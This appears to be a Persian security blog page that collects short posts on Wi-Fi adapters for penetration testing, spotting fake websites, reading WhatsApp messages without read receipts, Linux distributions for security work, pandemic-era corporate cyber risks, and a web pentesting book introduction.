بلاگ | blog

معرفی کارت شبکه مناسب تست نفوذ وایرلس

معرفی کارت شبکه مناسب تست نفوذ وایرلس

 

معرفی کارت شبکه مناسب تست نفوذ وایرلس

در این مقاله قصد دارم بهترین کارت‌های شبکه مناسب تست نفوذ وایرلس را خدمت شما دوستان عزیز معرفی کنم.

باید به این نکته توجه داشته باشید که انواع مختلفی از کارت‌های شبکه در بازار وجود دارد ولی همگی مناسب فرایند تست نفوذ نیستند.

برای تست نفوذ یک شبکه وایرلس با کالی لینوکس به یک کارت شبکه با قابلیت packet injection و monitor mode نیاز داریم.

اکثر نمونه‌های موجود در بازار این دو ویژگی را ندارند.

پس لازم است بررسی کنیم که کارت شبکه مناسب باید چه ویژگی‌هایی داشته باشد و چه مدل‌هایی این ویژگی‌ها را دارند.

لازم به ذکر است اگر قصد یادگیری وایرلس هکینگ پیشرفته را دارید می توانید از این دوره آموزشی استفاده کنید تا به صورت تخصصی به این بحث مسلط شوید.

 

کارت شبکه آلفا Alfa AWUS036NH

کارت شبکه آلفا Alfa AWUS036NH

شرکت تولید کننده این کارت شبکه انواع مختلفی از کارت شبکه‌های مناسب تست نفوذ را ارائه می‌کند که در بین مدل‌های تولید شده، این مدل بهترین است.

 

کارت شبکه آلفا Alfa AWUS036NEH

کارت آلفا Alfa AWUS036NEH

این مدل به دلیل کوچک بودن و حمل راحت‌تر طرفداران ویژه‌ای را به خود اختصاص داده است.

 

کارت شبکه آلفا Alfa AWUS036NHA

 

 

کارت شبکه آلفا Alfa AWUS036ACH

کارت شبکه آلفا Alfa AWUS036ACH

به دلیل وجود ۲ آنتن در این مدل سرعت تست نفوذ بالاتر و برد کاری نیز بیشتر خواهد بود.

ویژگی خاص این کارت شبکه پشتیبانی از usb3 است.

 

کارت شبکه آلفا Alfa AWUS1900

کارت آلفا Alfa AWUS1900

در حال حاضر این کارت شبکه گران‌ترین و قدرتمندترین کارت شبکه برای تست نفوذ است.

از استانداردهای IEEE 802.11ac/a/n/g/b پشتیبانی می‌کند.

این بدان معنی است که می‌تواند ۲٫۴GHz و ۵GHz(باند دوگانه) را مدیریت کند.

سرعت ۶۰۰ مگابیت در ثانیه برای ۲٫۴GHz و سرعت ۱۳۰۰ مگابیت در ثانیه برای ۵GHz خواهد داشت.

 

کارت شبکه TP-Link N150 TL-WN722N

معرفی کارت شبکه مناسب تست نفوذ وایرلس

این آداپتور b/g/n یکی از محبوب‌ترین ابزارها برای پنتستر‌های مبتدی و حرفه‌ای هست.

ویژگی مهم این مدل قیمت مناسب آن نسبت به سایر مدل‌هاست.

این آداپتور با استاندارد IEEE 802.11N سازگار است و سرعت ۱۵۰ Mbps را فراهم می‌کند.

آنتن آداپتور قابلیت جابجایی دارد و اگر شما می‌خواهید محدوده بالاتری را داشته باشید، می‌توانید آنتنی با مقدار Dbi بزرگ‌تر وصل کنید.

نسخه جدید این مدل دارای چیپست متفاوتی است که مناسب کار تست نفوذ نیست پس اگر قصد تهیه این مدل را دارید نسخه قدیمی آن را پیدا کنید.

 

راستی تا یادم نرفته بگم که اگر به تست نفوذ پیشرفته وای‌فای علاقه دارید این دوره آموزشی رو از دست ندید:

 

دوره آنالیز امنیتی شبکه‌های وایرلس(پیشرفته)

دوره آنالیز امنیتی شبکه‌های وایرلس(پیشرفته)

توضیحات دوره:

بسیاری از افراد آشنایی مختصری با روش‌های تست نفوذ شبکه‌های وایرلس دارند و همیشه این تصور در ذهن این افراد وجود دارد که به صورت کامل با بحث تست نفوذ شبکه‌های وایرلس آشنا هستند.

زمانی که با آنها صحبت می‌کنیم این موارد را تضمین کننده امنیت می‌دانند:

  • استفاده از MAC Filtering
  • مخفی کردن SSID
  • استفاده از پسورد قوی
  • استفاده از پروتکل امنیتی WPA2

آنها اشتباه نمی‌کنند، فقط در این زمینه اطلاعات تخصصی ندارند.

در این دوره آموزشی ما در مورد انواع حملات، علت پیدایش، روش‌های مقابله و… صحبت می‌کنیم، همچنین پروتکل‌های امنیتی مختلف را به صورت کاملا موشکافانه آنالیز و بررسی می‌کنیم.

نکته بسیار مهم، پروژه محور بودن آموزش و پیاده کردن تک تک مراحل به صورت عملی است.

هدف ما آشنایی کامل شما با این مباحث و تبدیل شدن شما به یک متخصص حرفه‌ای است به شکلی که در پایان کار بتوانید صاحب نظر باشید.

برای شروع کار نیاز به نصب کالی لینوکس خواهید داشت.

 

“معرفی کارت شبکه مناسب تست نفوذ وایرلس”

 

۹ روش در تشخیص سایت‌های جعلی

۹ روش در تشخیص سایت‌های جعلی

9 روش در تشخیص سایت‌های جعلی

شاید شما هم پیش از این با ‌سایت‌های جعلی، تقلبی و ‌سایت‌هایی که با هدف حملاتی مثل  فیشینگ طراحی شده‌اند، رو به رو شده باشید.

با بررسی دقیق چنین ‌سایت‌هایی متوجه یکسری خصوصیات مشترک بین همه آن‌ها می‌شویم.

در این مطلب مراحلی ساده برای تشخیص تقلبی و جعلی بودن ‌سایت‌ها به شما آموزش می‌دهیم.

۱. نام دامنه 

خیلی از سایت‌های جعلی از نام‌های دامنه‌ای شبیه به نام دامنه ‌سایت اصلی استفاده می‌کنند.

مثلا ممکن است سایت‌های مربوط به برندهایی مثل  apple  که به صورت www.appleshop.com هستند، واقعی نیستند.

معمولا آدرس سایت کمپانی‌ها، نام خود کمپانی خواهد بود.

 

۲. عدم وجود اطلاعات تماس

در صورتی که در سایتی صفحه تماس با ما وجود نداشته باشد، این مورد یک نشانه قوی از جعلی بودن آن ‌سایت است.

 هر کمپانی که محصولات یا خدماتی را ارائه می‌کند، حتماً یک موقعیت جغرافیایی مشخص، یک شماره تلفن و ایمیل برای تماس دارد.

در صورت عدم وجود هر یک از این اطلاعات، به احتمال زیاد این ‌سایت تقلبی، قصد دریافت اطلاعات مهم شما را دارد.

در ادامه تصویری از یک ‌سایت تقلبی را مشاهده می‌کنید که هیچ اطلاعاتی برای تماس با کمپانی در آن وجود ندارد.

9 روش در تشخیص سایت‌های جعلی و تقلبی

تصویری از صفحه تماس با ما سایت معتبر:

9 روش در تشخیص سایت‌های جعلی و تقلبی

 

 ۳. گرامر و املاء را با دقت چک کنید

اگر یک ‌سایت جعلی بخواهد خودش را به جای یک سایت اصلی تجاری جا بزند، معمولا از متن انگلیسی استفاده می‌کند اما در چنین ‌سایت‌هایی اشتباهات گرامری و املایی شدید و قابل توجهی دیده می‌شوند.

اکثر این اشتباهات برای کسی که به زبان انگلیسی تسلط دارد مشهود است.

بنابراین وجود اشتباهات گرامری یا املایی یک شاخص قوی از جعلی بودن سایت است.

 

۴. از WHOIS استفاده کنید

برای این که متوجه شوید نام دامنه متعلق به چه کسی است از https://who.is استفاده کنید.

نتیجه این جستجو شرکت ثبت کننده سایت، زمان ایجاد ‌سایت، زمان انقضای ‌سایت و اطلاعات تماس را به شما اعلام می‌کند.

یکی دیگر از موارد مهم، طول مدت زمان ایجاد آن دامنه است.

در صورتیکه از ساخت این ‌سایت بیشتر از ۱ سال نمی گذرد، در این صورت آن ‌سایت به احتمال زیاد جعلی است.

 

۵. اطلاعات تماس را بررسی کنید 

اگر اطلاعات تماس در ‌سایت مورد بررسی قرار دارد، سعی کنید با آن شماره تماس گرفته یا به آدرس ذکر شده ایمیلی ارسال کنید.

در صورتی که شماره تلفن ذکر شده در شبکه وجود نداشت یا به هر دلیل دیگری موفق به برقراری تماس نشدید در این صورت باید مراقب باشید.

۶. بررسی کنید که صفحات ورود، ایجاد حساب کاربری و پرداخت، ایمن باشند

خیلی از وسایت‌های تقلبی یا جعلی زحمت خرید مجوز SSL (Secure Sockets Layer) را به خودشان نمی‌دهند.

مجوزهای SSL در مواقعی که شما قصد ارسال اطلاعات حساس‌تان را دارید، این انتقال را به صورت امن انجام داده و در مقابل هزینه‌ای را دریافت می‌کنند.

معمولا سایت‌های تقلبی و جعلی در اکثر مواقع زحمت تهیه مجوز SSL را به خودشان نمی‌دهند.

اگر سایتی مثل سایت فرانش مجاز و امن باشد، در کنار آدرس سایت عبارت HTTPS و آیکن قفل را مشاهده می‌کنید.

 

 

۷. قوانین کمپانی را در زمینه تحویل و بازگشت محصول بررسی کنید

اگر در سایت مورد نظر محصولی فروخته می‌شود، باید خط مشی تحویل محصول و باز پس‌گیری آن در سایت لیست شده باشد.

اگر این کمپانی واقعی و اصلی باشد باید اعلام کرده باشد که در صورت ناقص بودن محصول چطور و چگونه آن را پس می‌گیرد.

اگر محصولی را ارائه می‌کند باید مشخص کند که تحویل محصول چقدر زمان می‌برد.

اگر آدرسی برای بازگشت محصول ارائه نشده و سیاست ‌سایت برای تحویل محصولات مبهم و گنگ است از چنین ‌سایتی خرید نکنید.

 

۸. نام دامنه را در گوگل بررسی کنید 

اگر نام دامنه را در گوگل تایپ کنید، در صورت واقعی بودن آن سایت باید در سایت‌های دیگر لینک آن سایت وجود داشته باشد.

اگر فقط نام دامنه ظاهر شد و هیچ نتیجه دیگری برای آن دامنه نمایان نشد، در این صورت آن ‌سایت کاملا مشکوک است.

 

۹. نظرات سایر افراد را بررسی کنید

نام دامنه و بعد از آن کلمه “reviews” یا “نظرات کاربران” را در یک موتور جستجو تایپ کنید.

در حالت ایده آل نتیجه جستجوی شما حاوی تجربیات سایر کاربران درباره آن محصول خواهد بود.

اگر نظرات مشتریان درباره آن محصول منفی است در این صورت باید از خرید در چنین وب‌سایتی جدا خودداری کنید.

قربانی کلاهبرداری شدن هرگز تجربه خوشایندی نیست.

برای محافظت از خودتان در فضای آنلاین و کسب بهترین تجربه در خرید، نکات ذکر شده را به خاطر داشته باشید.

اگر ‌سایتی که مشاهده می‌کنید به نظر مشکوک می‌رسد بهتر است قبل از تصمیم‌گیری و یا اقدام به خرید، کمی درباره آن تحقیق و بررسی کنید.

 

“۹ روش در تشخیص سایت‌های جعلی”

خواندن پیام‌های واتساپ بدون خوردن تیک آبی

خواندن پیام‌های واتساپ بدون خوردن تیک آبی

بعد از فیلتر شدن تلگرام در ایران، کاربران بیشتری اقدام به نصب واتساپ کردند.

اکنون اکثر کاربران از واتساپ در کنار تلگرام و سایر پیام‌رسان‌ها استفاده می‌کنند.

تیک آبی واتساپ یکی از ویژگی‌های این پیام‌رسان بوده که وضعیت پیام ارسالی را مشخص می‌کند.

اگر می‌خواهید که پیام طرف مقابل‌تان را بخوانید، اما وی متوجه این موضوع نشود، این مقاله را به صورت کامل مطالعه کنید.

خواندن پیام‌های واتساپ بدون خوردن تیک آبی

خواندن پیام بدون خوردن تیک آبی واتساپ با استفاده از ویجت اندروید

یکی از ویژگی‌های اصلی سیستم‌عامل اندروید، استفاده از ویجت‌ها بر روی صفحه اصلی گوشی است.

خبر خوب این که واتساپ به خوبی از ویجت‌ها پشتیبانی می‌کند.

کار اصلی ویجت واتساپ، ارائه نوتیفیکیشن‌ها و یا همان پیام‌های ارسال شده توسط کاربران است.

بنابراین شما می‌توانید با اضافه کردن ویجت، پیام‌ها را بخوانید، بدون آن‌که طرف مقابل متوجه خواندن پیام توسط شما شود و تیک آبی واتساپ را ببیند.

برای استفاده از ویجت‌‌ واتساپ بر روی صفحه اصلی در گوشی‌های اندرویدی، می‌بایست طبق روش زیر عمل کنید:

  • ابتدا برای چند ثانیه انگشت‌تان را بر روی صفحه اصلی گوشی‌ نگه دارید.
  • در صفحه تنظیمات باز شده، به دنبال گزینه ویجت بگردید (با توجه به نوع گوشی این گزینه ممکن است در جای متفاوتی باشد).
  • حالا ویجت واتساپ (Whatsapp) را پیدا کنید، انگشت‌تان را چند ثانیه بر روی آن نگه دارید و آن را به یک جای مناسب در صفحه بکشید.
  • شما می‌توانید با لمس ویجت، سایز آن را تغییر دهید تا با بزرگتر کردن آن امکان مشاهده محتوای بیشتری را داشته باشید.

به همین راحتی.

از حالا به بعد، زمانی که کسی پیام جدیدی برای شما بفرستد، می‌توانید آن را در ویجت واتساپ به‌صورت کامل بخوانید، بدون آنکه طرف مقابل متوجه این کار شود.

در واقع تا زمانی که وارد واتساپ نشوید، شخص متوجه خوانده شدن پیام توسط شما نخواهد شد.

توجه داشته باشید که در این حالت فقط پیام‌های واتساپ دیده می‌شوند و امکان دیدن تصاویر و ویدئوها وجود ندارد.

 

غیرفعال کردن گزینه Receipts

واتساپ وضعیت مطلع شدن از پیام‌های خوانده شده را به عنوان یک قابلیت در نظر گرفته و شما می‌توانید آن را شخصی سازی کنید.

یعنی اینکه می‌توانید کاری کنید که هنگام خواندن پیام‌های دیگران، اصلا اثری از تیک آبی نباشد.

البته این مورد کاملا دو طرفه بوده و در صورت غیرفعال کردن آن، پیام‌های ارسالی شما نیز بدون تیک آبی خواهد بود.

یعنی شما هم متوجه نمی‌شوید که طرف مقابل پیام‌های‌تان را خوانده یا نه!

برای این‌کار آموزش زیر را دنبال کنید (این آموزش برای گوشی‌های اندرویدی و آیفون‌ها یکسان است):

  • واتساپ را باز کنید و با استفاده از گزینه ۳ نقطه در بالا و سمت راست، وارد بخش تنظیمات شوید.
  • در بخش تنظیمات، گزینه Account را انتخاب نمایید.
  • وارد بخش Privacy شوید.
  • در نهایت تیک گزینه Read receipts را بردارید.

پیشنهاد مطالعه : جمع‌آوری اطلاعات (OSINT)

 

 

“خواندن پیام‌های واتساپ بدون خوردن تیک آبی”

 

۵ توزیع لینوکسی جذاب برای هکرها

۵ توزیع لینوکسی جذاب برای هکرها

در این پست با هم ۵ توزیع لینوکسی که بین هکرها (چه کلاه سفید و چه کلاه سیاه) محبوب است را بررسی می‌کنیم.

برای راحتی کار شما لینک سایت مرجع هر توزیع در کنار توضیحات قرار می‌گیرد.

همین ابتدای کار لازمه به این مورد اشاره کنم که شما با انتخاب یک سیستم‌عامل هکر نمی‌شوید. یادگیری هک و تبدیل شدن به یک هکر نیاز به تلاش فراوان و یادگیری مطالب مختلف دارد.

نصب کالی لینوکس کسی را هکر نمی‌کند. بلکه این دانش شما و تفکر شماست که از شما یک متخصص امنیت یا هکر می‌سازد.

در لیستی که امروز خدمتتون ارائه میشه، از توزیع‌های محبوبی نام می‌بریم که توسط بسیاری از نفوذگران استفاده میشه اما این به این معنا نیست که شما به این لیست محدود می‌شوید، بلکه می‌توانید از سایر توزیع‌های لینوکسی نیز استفاده کنید.

۱-Kali Linux

5 توزیع لینوکسی جذاب برای هکرها

 

کالی‌لینوکس یکی از قدرتمند‌ترین و محبوب‌ترین توزیع‌های هک‌و‌امنیت لینوکس است. کالی برپایه دبیان است و بصورت پیش فرض حدودا ۳۰۰ ابزار هک و امنیت رو شامل می‌شود.

کارایی مهمترین دغدغه توسعه‌دهندگان کالی است و هرگاه متوجه شوند ابزاری بروزرسانی نمی‌شود یا کارایی خود را از دست داده است، سریعا آن را از کالی حذف می‌کنند. کالی در ورژن ۲۰۱۷ خود بیش از ۷۰۰ ابزار داشت اما توسعه دهندگان شروع به گلچین کردن ابزارها کردند و حدودا ۳۰۰ ابزار قدرتمند را در کالی قرار داده‌اند.

این سیستم‌عامل متعلق به شرکت Offensive Security است و اولین بار در سال ۲۰۱۳ با هدف جایگزینی سیستم‌عامل قدیمی Backtrack معرفی شد و توانست بخوبی جایگزین Backtrack شود.

کالی مشکل شبکه و شناسایی کارت شبکه که در Backtrack باعث اذیت شدن کاربران بود را ندارد.

برای راحتی کار با این سیستم عامل بهتر است که از ۲ گیگ رم استفاده شود تا هیچ تاخیری در عملکرد سیستم عامل مشاهده نشود.

لینک سایت رسمی: https://www.kali.org

۲-Cyborg Linux

6 توزیع لینوکسی جذاب برای هکرها

 

توزیع cyborg لینوکس، برپایه اوبونتو و توسط برنامه‌نویسان هندی توسعه پیدا کرده است.

محیط دسکتاپ این سیستم‌عامل گنوم است و در دسته‌بندی امنیت و تست نفوذ قرار دارد.

این سیستم عامل در دو نسخه ۶۴ و ۳۲ بیت عرضه شده است.

در این توزیع بصورت پیش فرض بیش از ۷۵۰ ابزار مخصوص هک و امنیت وجود دارد.

Cyborg توانایی اجرا بصورت live با همان قدرت اصلی خود را دارد.

ابزار های این سیستم‌عامل در دسته‌های زیر قرار دارند :

  • اکسپلویت‌نویسی
  • جمع‌آوری اطلاعات
  • تست‌نفوذ
  • افزایش سطح دسترسی
  • هک سخت‌افزار
  • تست‌های نرم‌افزاری
  • مهندسی اجتماعی
  • فارنزیک
  • امنیت‌موبایل
  • امنیت شبکه‌های وایرلس
  • آنالیز سخت افزار
  • RFID/NFC

لینک سایت رسمی: https://sourceforge.net/projects/cyborghawk1/files/latest/download

 

۳-BlackArch

6 توزیع لینوکسی جذاب برای هکرها

 

BlackArch بر پایه سیستم‌عامل Arch Linux توسعه پیدا کرده است.

در اصل BlackArch همان Arch Linux است که مخصوص هک و امنیت است و برای اینکار بهینه شده است.

بیش از ۲۰۰۰ ابزار مخصوص هک و امنیت در مخزن این سیستم‌عامل در دسترس است که براحتی می‌توانید آنها را نصب و استفاده کنید.

این سیستم عامل شباهت بسیاری به کالی لینوکس و Parrot OS دارد اما از لحاظ میزکاری، متنوع‌تر است و به کاربر اجازه می‌دهد میز کار را خودش انتخاب کند.

محیط مشکی و قرمز این توزیع بسیار جذاب است.

 

لینک سایت رسمی: https://www.blackarch.org

 

۴-Parrot OS

6 توزیع لینوکسی جذاب برای هکرها

 

parrot یکی از زیباترین لینوکس‌ها است که برای هک و امنیت توسعه پیدا کرده است.

این سیستم‌عامل برپایه دبیان است و توسط تیم ایتالیایی Frozenbox توسعه داده شده است.

محیط دسکتاپ این سیستم عامل MATE و KDE plasma است.

هدف اصلی این سیستم عامل، هک و امنیت است و بصورت پیش‌فرض ابزارهای مخصوص هک و امنیت بر روی این سیستم عامل نصب هستند.

 

Parrot OS خود شامل ۳ نسخه می شود:

نسخه HOME : مخصوص کاربران خانگی و کارهای روزمره است

نسخه ARM : مخصوص نصب بر روی Raspberry Pi و Orange Pi

نسخه SECURITY : مخصوص متخصصان هک و امنیت که شامل ابزارهای متنوع این حوزه می‌باشد.

 

لینک سایت رسمی: https://www.parrotsec.org

 

۵-BackBox

6 توزیع لینوکسی جذاب برای هکرها

 

یکی دیگر از توزیع‌های جذاب لینوکس است که بر پایه اوبونتو توسعه پیدا کرده است.

BackBox از میز کار XFCE استفاده می‌کند و رابط کاربری ساده‌ای دارد.

دسته بندی‌های مختلفی مانند فارنزیک، جمع آوری اطلاعات، تست‌نفوذ و شناسایی آسیب‌پذیری، شنود، اکسپلویت‌نویسی ، مهندسی اجتماعی و … در این سیستم عامل وجود دارد.

اولین نسخه این سیستم عامل در سال ۲۰۱۰ عرضه شد.

 

لینک سایت رسمی: https://www.backbox.org

تاثیر کرونا بر امنیت سایبری شرکت‌ها و سازمان‌ها

تاثیر کرونا بر امنیت سایبری شرکت‌ها و سازمان‌ها

با شروع کرونا، شرکت‌ها و سازمان‌ها به سمت کاهش حضور فیزیکی پرسنل و افزایش دورکاری آن‌ها سوق پیدا کرده‌اند.

همین امر باعث تهدید امنیت سایبری آن‌ها و بروز مشکلاتی شده است.

از جمله این مسائل می‌توان به موارد زیر اشاره کرد؛

  • اتصال شبکه‌ای حفاظت نشده
  • آسیب‌پذیری سامانه‌ها
  • استفاده از بدافزارها توسط پرسنل
  • اتصال اینترانت به اینترنت و…

با ما همراه باشید تا مفصلا؛ با تاثیر کرونا بر امنیت سایبری شرکت‌ها و سازمان‌ها، آشنا شوید. 

تاثیر کرونا بر امنیت سایبری شرکت‌ها و سازمان‌ها

۱امکان دسترسی از راه دور برای کارکنان

با ایجاد دسترسی از راه دور برای کارمندان، سیستم شرکت‌ها و سازمان‎‌ها آسیب‌پذیر شده و امکان نشت اطلاعات سازمانی بیشتر می‌شود.

برای عملیاتی کردنِ دورکاری تعداد زیادی از کارکنان، ابتدا باید دسترسی کارکنان از طریق فایروال‌ها و مجازشماری آن‌ها بر اساس سازوکارهای امنیتی، ممکن شود.

با این کار قاعدتاً کنترل‌های مرسوم احراز هویت سازمانی، ضعیف‌­تر از قبل شده و امکان اتصال و استفاده سایر افراد غیرمجاز هم فراهم می­‌شود.

 

تاثیر رمز عبور ضعیف در کاهش امنیت سایبری

اغلب کارمندان، کلمه­‌های عبور بسیار ضعیفی را انتخاب می‌کنند و به رعایت الزامات مهم برای حفظ امنیت اطلاعات سازمانی، توجه چندانی ندارند.

در حالیکه دسترسی از راه دور به خدمات و زیرساخت‌­های سازمانی، موجب می‌شود سامانه‌­ها به راحتی در معرض حملات مربوط به حدس کلمه‌‌‌­های عبور کاربران، قرار بگیرند.

در نتیجه احتمال نشت اطلاعات سازمانی بیشتر می‌شود.

 

۲اتصال­ های شبکه ­ای محافظت نشده

اتصال به سامانه‌­های سازمانی، از طریق شبکه‌های محافظت نشده مثل کامپیوترهای شخصی، امنیت سایبری شرکت‌ها و سازمان‌ها را با خطر جدی روبه‌رو می‌کند.

کارمندانی که قبلا از طریق شبکه­های محافظت‌ شده به سامانه‌­های سازمانی متصل می­‌شدند، الان با لپ­تاپ­‌ها، تبلت­‌ها و رایانه­‌های شخصی به سامانه‌ها و تجهیزات سازمانی متصل می‌شوند.

این درحالیست که غالبا، هیچ­ نرم‌افزار امنیتیِ سیستم عاملی بر روی این وسیله‌ها نصب نشده است و این رایانه‌ها، آنتی ویروس لایسنس ­دار و به­ روزی ندارند.

حتی برخی درگیر از کارمندان هم، از گوشی هوشمند خود برای اتصال به سامانه‌های سازمانی استفاده می‌کنند که طبیعتا مشکلات افزون‌تری در پی دارد و امنیت سایبری را بیشتر به خطر می‌اندازد.

 

۳- آلودگی بدافزاری بیشتر شبکه‌های سازمانی

بدافزار

در بیشتر شرکت‌­ها و سازمان­‌ها، پورت‌های USB و درگاه‌­های انتقال فایل، به منظور کنترل امنیتی بسته شده است، تا از آلودگی بدافزاری توسط کارمندان جلوگیری شود.

اما با شیوع ویروس کرونا و لزوم دورکاری، این کنترل امنیتی بسیار کاهش می‌یابد؛ چون افراد برای انتقال اطلاعات و فایل‌ها، معمولاً از دو روش زیر استفاده می‌­کنند:

۱- ابزار ذخیره­ سازی شخصیِ قابل حمل مثل فلش یا USB

۲- ایمیل غیرسازمانی

از آنجایی که همۀ افراد، عادت به اسکن این وسیله‌ها توسط نرم­‌افزارهای آنتی ­ویروس، در هنگام اتصال­شان به سیستم‌ها ندارند و پیوست ایمیل­‌های دریافتی را هم بدون اسکن باز می­‌کنند.

بنابراین چنین کاری موجب آلودگی بیشتر شبکه‌های سازمانی به انواع بدافزارها و باج‌­افزارها می‌شود.

۴مهندسی اجتماعی کارمندان به منظور تخلیه اطلاعاتی

مهندسی اجتماعی (Social Engineering) در حوزه امنیت اطلاعات یعنی؛ دستکاری روانشناختی افراد برای انجام کارهای خاص یا افشای اطلاعات متمرکز.

فریب و مهندسی اجتماعیِ کارمندان در چند سال گذشته گسترش چشمگیری داشته است.

هم اکنون این موضوع با شیوع کرونا و افزایش خدمات دورکاری سازمانی، بیش از پیش، امنیت سایبری سازمان‌ها را تهدید می‌کند.

فریب مهندسی اجتماعی کارمندان با چه اهدافی صورت می‌گیرد؟

  • تخلیه اطلاعاتی کارمندان
  • به دست آوردن دسترسی غیرمجاز به سامانه‌ها
  • دسترسی به اطلاعات و تجهیزات سازمانی
  • دستیابی به اطلاعات حساب کاربری و کلمه عبور کارمندان
  • آگاهی از روش‌های اتصال کارکنان به سامانه­‌های سازمانی و…

مهندسی اجتماعی

 

راه‌های متداول فریب و مهندسی اجتماعی کارمندان چیست؟

چهار روش متداول فریب و مهندسی اجتماعی به شرح زیر است:

  • ارسال اس ­ام اس ­های فیشینگ (تله گذاری)
  • فیشینگ تلفنی
  • طراحی وب سایت­‌های مشابه با سایت‌­های خدمات رسان بهداشتی و بانکی
  • طراحی وب سایت­‌ به منظور دریافت کمک­‌های مردمی

هر چند که با راه ­اندازی رمز یک­بار مصرف، فریب و مهندسی اجتماعی کارمندان، کاهش چشم­گیری داشته است اما همچنان امکان مقابله با این حملات از طریق سازوکارهای امنیتی فعلی وجود ندارد.

همچنین شناخت این حملات به دلیل تسلط بالای نفوذگر بر روش خود، برای بیشتر کارمندان سخت است.

به همین دلیل افزایش آگاهی کارمندان با روش‌های مختلف این فریب‌ها، بسیار ضروری است.

 

۵ارسال بدافزار به کارمندان در مورد کرونا

ارسال انواع بدافزارها به ایمیل کارمندان، در قالب لینک سایت­‌های خبری و اطلاع از آخرین اخبار مرتبط با ویروس کرونا، یکی دیگر از تهدیدهای ویروس کرونا برای حوزه امنیت سایبری است.

ایمیل‌­هایی که با عناوین جعلی و در قالب نهادهایی معتبر، همچون سازمان بهداشت جهانی برای کاربران بسیاری ارسال شده‌­اند.

همچنین عکس‌های ارسالی به ایمیل کارکنان و فریب آن‌ها جهت کلیک کردن بر روی لینک­‌ها و باز کردن فایل‌های ضمیمه که آلوده هستند.

 

با شیوع کرونا شبکه‌های اجتماعی و پیام ­رسان­‌های برخط چگونه امنیت سایبری را تهدید می‌کنند؟

شبکه­‌های اجتماعی و پیام ­رسان­‌های برخط می­‌توانند موجب افزایش آلودگی­‌های بدافزاری شوند.

طراحی پروفایلی مشابه با افراد مشهور و مسئولین دولتی در ستاد ملی مبارزه با ویروس کرونا، موجب گمراهی بیشتر کاربران خواهد شد.

چون علاوه بر سوءاستفاده‌های شخصی، می‌توانند از آن‌ها برای انجام فعالیت­‌های سازمانی هم استفاده می‌شود.

در نتیجه افراد بیشتری با خطر مواجه خواهند شد.

 

 ۶سامانه ­های آسیب‌پذیر

کرونا باعث شده است که سامانه­ ها و تجهیزات سازمانی، از راه دور و اینترنتی در دسترس کارکنان قرار بگیرد.

امری که آسیب‌پذیری­ بسیار زیادی به دنبال دارد. چرا که در بیشتر موارد شرکت­‌ها و سازمان­‌ها، انجام آزمون­‌های تست نفوذ را به منظور یافتن نقاط آسیب‌پذیر سامانه‌ها انجام نداده‌اند و به همین دلیل آسیب پذیری‌های برطرف نشده مهم و زیادی در آن‌ها وجود دارد.

این موضوع برای نفوذگران سایبری بسیار جذابی بوده و موجب سوءاستفاده آن‌ها از این آسیب‌پذیری‌ و امکان دسترسی به اطلاعات سازمانی می‌شود.

 

۷اتصال اینترانت به اینترنت

اینترانت یا جداسازی شبکه‌­های سازمانی از اینترنت به صورت فیزیکی، یکی از موارد مطرح در امنیت اطلاعات سازمانی است.

موضوعی که عملا با شیوع کرونا و لزوم دورکاری کارمندان به کار گرفته نمی‌شود چون هم اکنون کارکنان به سرویس‌های سازمانی از بستر نا امن اینترنت وارد می‌شوند.

 

نتیجه­ گیری

وضعیت امنیت سایبری در کشورمان و آگاهی بخشی‌­های مورد نیاز به کارکنان، در جایگاه مطلوبی قرار ندارد.

حوادث امنیت اطلاعات در سال­‌های اخیر، تاییدی بر این نکته است.

به همین دلیل پیش‌­بینی می‌شود که روند مخاطرات سایبری سازمانی در آینده به شدت افزایش یابد.

از این­ رو اتخاذ تدابیر امنیتی مناسب توسط شرکت‌ها و سازمان­‌ها، همچنین آماده‌سازی زیرساخت‌های مورد نظر، در مورد تهدیداتی که به آن‌ها اشاره شد، می­ تواند به مدیران سازمانی در گذر از این بحران کمک کرده و از وقوع فجایع سایبری جلوگیری کند.

 

اما به نظر شما کدام یک از این تهدیدها بیشتر از بقیه، برای سازمان‌های ایرانی مشکل ساز هستند؟

شما چه راهکارهایی برای مقابله با چالش‌های امنیت سایبری، برخاسته از ویروس کرونا در نظر دارید؟

جواب سوالات را در قسمت نظرات این مقاله بنویسید و با ما در ارتباط باشید.

 

“تاثیر کرونا بر امنیت سایبری شرکت‌ها و سازمان‌ها”

کتاب تکنیک‌های تست و نفوذ به وب سایت

معرفی کتاب تکنیک‌های تست و نفوذ به وب سایت

بهروز منصوری و شهاب الدین علی آبادی فراهانی در کتاب تکنیک‌های تست و نفوذ به وب سایت ضمن بررسی برخی از خطرات و حملات مربوط به وب‌سایت‌ها شما را با مباحثی آشنا می‌کنند که بتوانید جهت پیشگیری و امن‌سازی وب سایت خود از آن‌ها استفاده نمایید.

معرفی کتاب تکنیک‌های تست و نفوذ به وب سایت

امروزه افراد بسیاری در سرتاسر دنیا به اینترنت دسترسی دارند.

افرادی که چه در زمان عضویت در یک شبکه اجتماعی و چه در زمان استفاده از وب سایت‌های بزرگ بانکی، نیازمند امنیت برای حفظ اطلاعات خود هستند.

در حال حاضر امنیت در فضای اینترنت روز به روز اهمیت بیشتری پیدا می‌کند.

با افزایش تعداد کاربران اینترنت، تعداد افرادی هم که در پی سوء استفاده در این فضا هستند رو به افزایش است.

به همین خاطر امنیت و حفاظت در اینترنت یکی از مهارت‌های پر اهمیت دنیای تکنولوژی محسوب می‌شود که می‌بایست در هر سطحی مورد توجه قرار بگیرد.

بنابراین چه کاربران عادی و چه متخصصان و طراحان وب سایت‌ها‌ همگی باید به دانشی درست برای حفظ امنیت دست پیدا کنند.

باید توجه داشت که حملات آنلاین اهداف گوناگونی دارند.

وب سایت شما ممکن است اطلاعات ارزشمندی برای دزدیده شدن داشته باشد و یا از آن برای نشر بدافزار‌ها استفاده شود.

همان طور که می‌دانیم یکی از مهم‌ترین اعضای یک برنامه کامپیوتری پایگاه داده آن است، پس یکی از قسمت‌هایی که معمولا هکرها علاقه خاصی به نفوذ در آن دارند، پایگاه داده نرم‌افزار خواهد بود.

دلیل این امر بسیار ساده است، زیرا پایگاه داده قلب تپنده نرم‌افزار بوده و اطلاعات مهمی مثل سوابق مشتریان یا اسناد محرمانه یک شرکت را دارد.

کتاب تکنیک‌های تست و نفوذ به وب سایت

در بخشی از کتاب تکنیک‌های تست و نفوذ به وب سایت می‌خوانیم:

در ایران معمولا پس از کشف آسیب ‌پذیری، مسیری بسیار بد طی می‌شود.

ابتدا هکر کلاه ‌سفید، در میان شبکه‌های اجتماعی و آشنایان به دنبال آشنایی می‌گردد تا بتواند باگ خود را به پول تبدیل کند.

